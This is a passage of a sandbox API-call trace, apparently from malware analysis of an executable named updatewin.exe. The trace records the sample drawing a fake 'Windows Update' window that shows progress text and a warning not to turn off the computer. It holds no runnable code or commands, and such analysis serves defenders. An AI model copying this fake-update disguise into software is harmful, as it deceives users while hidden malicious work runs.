(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe")) returned 0x5e [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xc6) returned 0x50d360 [0045.438] RtlInitializeSListHead (in: ListHead=0x413ad0 | out: ListHead=0x413ad0) [0045.438] GetLastError () returned 0x0 [0045.438] GetEnvironmentStringsW () returned 0x50d430* [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xaca) returned 0x50df08 [0045.438] FreeEnvironmentStringsW (penv=0x50d430) returned 1 [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x98) returned 0x50afc8 [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3e) returned 0x50d430 [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6c) returned 0x50d478 [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6e) returned 0x50d4f0 [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x78) returned 0x4f1270 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x50d568 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f52c0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x50d5d8 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x28) returned 0x50d628 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1a) returned 0x50d0a8 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4a) returned 0x50d658 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x72) returned 0x4f12f0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f52f8 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f5330 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1c) returned 0x50d0d0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd2) returned 0x50d6b0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x7c) returned 0x50d790 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x50d818 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x50e9f8 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x90) returned 0x50d858 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x50d8f0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5368 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x50d920 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x50d960 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x50d9b0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x50ea40 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x82) returned 0x50da10 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f53a0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x50d0f8 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4f53d8 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x50daa0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x50db00 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4f5410 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x50ea88 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x50db60 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x50dbc0 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5448 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x8c) returned 0x50dbf0 [0045.439] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50df08 | out: hHeap=0x4e0000) returned 1 [0045.439] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x800) returned 0x50dc88 [0045.440] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.440] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402116) returned 0x404e69 [0045.446] GetStartupInfoW (in: lpStartupInfo=0x18e548 | out: lpStartupInfo=0x18e548*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0045.446] InitCommonControlsEx (picce=0x18e564) returned 1 [0045.446] LoadIconW (hInstance=0x400000, lpIconName=0x6b) returned 0x601c5 [0045.448] LoadStringW (in: hInstance=0x400000, uID=0x67, lpBuffer=0x414378, cchBufferMax=100 | out: lpBuffer="Windows Update") returned 0xe [0045.448] LoadStringW (in: hInstance=0x400000, uID=0x6d, lpBuffer=0x4142b0, cchBufferMax=100 | out: lpBuffer="WINDOWSUPDATE") returned 0xd [0045.448] LoadIconW (hInstance=0x400000, lpIconName=0x6b) returned 0x601c5 [0045.448] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0045.448] LoadIconW (hInstance=0x400000, lpIconName=0x6c) returned 0x8010f [0045.448] RegisterClassExW (param_1=0x18e510) returned 0xc13b [0045.448] GetDesktopWindow () returned 0x10010 [0045.448] MonitorFromWindow (hwnd=0x10010, dwFlags=0x2) returned 0x10001 [0045.449] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x18e510 | out: lpmi=0x18e510) returned 1 [0045.449] CreateWindowExW (dwExStyle=0x0, lpClassName="WINDOWSUPDATE", lpWindowName="Windows Update", dwStyle=0x0, X=1002, Y=600, nWidth=418, nHeight=240, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xf011c [0045.701] NtdllDefWindowProc_W () returned 0x0 [0045.701] NtdllDefWindowProc_W () returned 0x1 [0045.703] NtdllDefWindowProc_W () returned 0x0 [0045.705] CreateDialogParamW (hInstance=0x400000, lpTemplateName=0x65, hWndParent=0xf011c, lpDialogFunc=0x401360, dwInitParam=0x0) returned 0x401ae [0045.713] NtdllDefWindowProc_W () returned 0x0 [0045.716] NtdllDefWindowProc_W () returned 0x0 [0045.716] NtdllDefWindowProc_W () returned 0x0 [0045.722] GetClientRect (in: hWnd=0x401ae, lpRect=0x18d358 | out: lpRect=0x18d358) returned 1 [0045.722] GetDlgItem (hDlg=0x401ae, nIDDlgItem=1000) returned 0x301aa [0045.722] MoveWindow (hWnd=0x301aa, X=295, Y=167, nWidth=95, nHeight=23, bRepaint=1) returned 1 [0045.722] GetDlgItem (hDlg=0x401ae, nIDDlgItem=1001) returned 0x301b2 [0045.722] MoveWindow (hWnd=0x301b2, X=95, Y=134, nWidth=225, nHeight=16, bRepaint=1) returned 1 [0045.722] SendMessageW (hWnd=0x301b2, Msg=0x401, wParam=0x0, lParam=0x640000) returned 0x640000 [0045.723] SendMessageW (hWnd=0x301b2, Msg=0x402, wParam=0x4, lParam=0x0) returned 0x0 [0045.730] timeGetTime () returned 0x1144ff5 [0045.730] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401690, lpParameter=0x401ae, dwCreationFlags=0x0, lpThreadId=0x4142a4 | out: lpThreadId=0x4142a4*=0xa28) returned 0xbc [0045.731] ShowWindow (hWnd=0x401ae, nCmdShow=5) returned 0 [0045.731] GetClientRect (in: hWnd=0xf011c, lpRect=0x18df10 | out: lpRect=0x18df10) returned 1 [0045.731] MoveWindow (hWnd=0x401ae, X=0, Y=0, nWidth=412, nHeight=212, bRepaint=1) returned 1 [0045.732] NtdllDefWindowProc_W () returned 0x0 [0045.732] SetWindowPos (hWnd=0xf011c, hWndInsertAfter=0xffffffff, X=0, Y=0, cx=0, cy=0, uFlags=0x3) returned 1 [0045.732] NtdllDefWindowProc_W () returned 0x0 [0045.732] NtdllDefWindowProc_W () returned 0x0 [0045.732] NtdllDefWindowProc_W () returned 0x0 [0045.827] NtdllDefWindowProc_W () returned 0x0 [0045.828] NtdllDefWindowProc_W () returned 0x0 [0045.828] NtdllDefWindowProc_W () returned 0x1 [0045.829] NtdllDefWindowProc_W () returned 0x0 [0045.847] NtdllDefWindowProc_W () returned 0x0 [0045.848] NtdllDefWindowProc_W () returned 0x0 [0045.848] NtdllDefWindowProc_W () returned 0x0 [0045.849] NtdllDefWindowProc_W () returned 0x0 [0045.849] ShowWindow (hWnd=0xf011c, nCmdShow=1) returned 0 [0045.849] NtdllDefWindowProc_W () returned 0x0 [0045.850] NtdllDefWindowProc_W () returned 0x0 [0045.850] NtdllDefWindowProc_W () returned 0x0 [0045.853] NtdllDefWindowProc_W () returned 0x1 [0045.854] NtdllDefWindowProc_W () returned 0x0 [0045.854] NtdllDefWindowProc_W () returned 0x0 [0045.854] NtdllDefWindowProc_W () returned 0x0 [0045.854] UpdateWindow (hWnd=0xf011c) returned 1 [0045.854] BeginPaint (in: hWnd=0xf011c, lpPaint=0x18e328 | out: lpPaint=0x18e328) returned 0x1e01081a [0045.854] EndPaint (hWnd=0xf011c, lpPaint=0x18e328) returned 1 [0045.854] BeginPaint (in: hWnd=0x401ae, lpPaint=0x18da10 | out: lpPaint=0x18da10) returned 0x1c010794 [0045.857] CreateSolidBrush (color=0x5b3ef) returned 0x1e100250 [0045.857] FillRect (hDC=0x1c010794, lprc=0x18da00, hbr=0x1e100250) returned 1 [0045.861] DeleteObject (ho=0x1e100250) returned 1 [0045.861] DrawIcon (hDC=0x1c010794, X=7, Y=7, hIcon=0x601c5) returned 1 [0045.862] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x130a025b [0045.862] SelectObject (hdc=0x1c010794, h=0x130a025b) returned 0x18a002e [0045.862] SetBkMode (hdc=0x1c010794, mode=1) returned 2 [0045.862] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0045.862] TextOutW (hdc=0x1c010794, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0045.865] SelectObject (hdc=0x1c010794, h=0x18a002e) returned 0x130a025b [0045.865] CreateSolidBrush (color=0xffffff) returned 0x1f100250 [0045.865] FillRect (hDC=0x1c010794, lprc=0x18d9f0, hbr=0x1f100250) returned 1 [0045.865] DeleteObject (ho=0x1f100250) returned 1 [0045.865] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x140a07fc [0045.873] SelectObject (hdc=0x1c010794, h=0x140a07fc) returned 0x18a002e [0045.873] SetBkMode (hdc=0x1c010794, mode=1) returned 1 [0045.873] lstrlenW (lpString="Getting your update ready.") returned 26 [0045.873] TextOutW (hdc=0x1c010794, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0045.873] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0045.873] TextOutW (hdc=0x1c010794, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0045.873] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0045.873] TextOutW (hdc=0x1c010794, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0045.873] SelectObject (hdc=0x1c010794, h=0x18a002e) returned 0x140a07fc [0045.873] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x580a0248 [0045.875] SelectObject (hdc=0x1c010794, h=0x580a0248) returned 0x18a002e [0045.875] SetBkMode (hdc=0x1c010794, mode=1) returned 1 [0045.875] SetTextAlign (hdc=0x1c010794, align=0x6) returned 0x0 [0045.875] wsprintfW (in: param_1=0x18da50, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0045.875] lstrlenW (lpString="Percent complete: 4%") returned 20 [0045.875] TextOutW (hdc=0x1c010794, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0045.881] SelectObject (hdc=0x1c010794, h=0x18a002e) returned 0x580a0248 [0045.881] EndPaint (hWnd=0x401ae, lpPaint=0x18da10) returned 1 [0045.901] LoadAcceleratorsW (hInstance=0x400000, lpTableName=0x6d) returned 0x9016b [0045.901] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0045.901] NtdllDefWindowProc_W () returned 0x0 [0045.901] NtdllDefWindowProc_W () returned 0x0 [0045.901] NtdllDefWindowProc_W () returned 0x0 [0045.901] TranslateAcceleratorW (hWnd=0x0, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0045.901] TranslateMessage (lpMsg=0x18e548) returned 0 [0045.901] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0045.901] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0045.901] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0045.901] TranslateMessage (lpMsg=0x18e548) returned 0 [0045.901] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0045.901] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0045.901] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0045.902] TranslateMessage (lpMsg=0x18e548) returned 0 [0045.902] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0045.902] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0045.917] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0045.917] TranslateMessage (lpMsg=0x18e548) returned 0 [0045.917] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0045.917] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0045.949] TranslateAcceleratorW (hWnd=0x301b0, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0045.949] TranslateMessage (lpMsg=0x18e548) returned 0 [0045.949] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0045.949] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0045.964] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0045.964] TranslateMessage (lpMsg=0x18e548) returned 0 [0045.964] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0045.964] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.011] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.011] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.011] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.011] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.011] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.011] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.011] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.012] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.120] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.120] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.120] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.120] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.166] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.166] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.166] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.166] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.213] TranslateAcceleratorW (hWnd=0x40122, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.213] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.213] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.213] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.213] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.213] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.213] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.213] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.213] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.213] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.213] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.214] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.307] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.307] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.307] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.308] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.308] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.308] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.308] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.309] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.806] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.806] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.806] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.806] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.884] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.884] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.884] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.884] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.884] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.884] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.884] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.885] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.931] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.931] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.931] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.931] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.931] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.931] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.932] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.933] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.979] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.979] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.979] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.979] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0046.979] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0046.979] TranslateMessage (lpMsg=0x18e548) returned 0 [0046.979] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0046.980] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.024] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.024] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.025] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.025] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.025] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.025] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.025] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.025] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.071] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.071] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.071] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.071] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.071] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.071] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.071] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.072] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.118] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.118] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.118] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.118] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.118] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.118] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.118] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.119] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.165] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.165] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.165] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.165] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.165] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.165] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.165] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.166] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.212] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.212] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.212] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.212] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.212] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.212] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.212] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.213] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.259] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.259] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.259] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.259] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.259] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.259] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.259] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.260] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.305] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.305] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.305] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.305] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.305] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.305] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.305] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.306] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.352] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.352] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.352] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.352] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.352] TranslateAcceleratorW (hWnd=0x301b2, 